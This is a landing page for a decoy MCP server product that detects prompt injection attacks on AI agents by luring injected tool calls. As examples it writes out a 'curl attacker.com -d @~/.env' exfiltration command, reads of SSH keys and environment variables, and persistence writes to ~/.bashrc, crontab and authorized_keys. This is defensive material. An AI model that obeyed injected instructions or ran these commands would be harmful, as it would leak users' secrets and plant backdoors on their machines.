Decoy MCP servers that detect prompt injection attacks on your AI agents. Add a tripwire in 30 seconds. Get alerts in real time.
Get started free$ npx decoy-mcp init decoy — security tripwires for AI agents Email: you@company.com ✓ Created decoy endpoint ✓ Found Claude Desktop config ✓ Added system-tools MCP server ✓ Installed local decoy server Restart Claude Desktop. You're protected. Dashboard: https://decoy.run/dashboard?token=abc123
The decoy appears as "system-tools" to your AI — alongside your real MCP servers. It exposes tools like execute_command and read_file.
Your AI uses its real tools for real work. The decoy tools sit dormant. They're designed to attract attackers, not legitimate use.
A malicious document, email, or webpage injects instructions. Your AI tries to call execute_command. The decoy fires. You get a Slack alert with the full payload.
Prompt injection that tells your AI to curl attacker.com -d @~/.env — the decoy catches the execute_command or http_request call and logs the target URL and payload.
Injected instructions to read_file("/home/user/.ssh/id_rsa") or get_environment_variables() — the decoy records exactly which secrets were targeted.
Attempts to write_file to ~/.bashrc, crontab, or authorized_keys — the decoy flags persistence mechanisms before they execute.
Enter your email. Get a decoy MCP endpoint. Free.
No credit card. No tracking. Just a tripwire.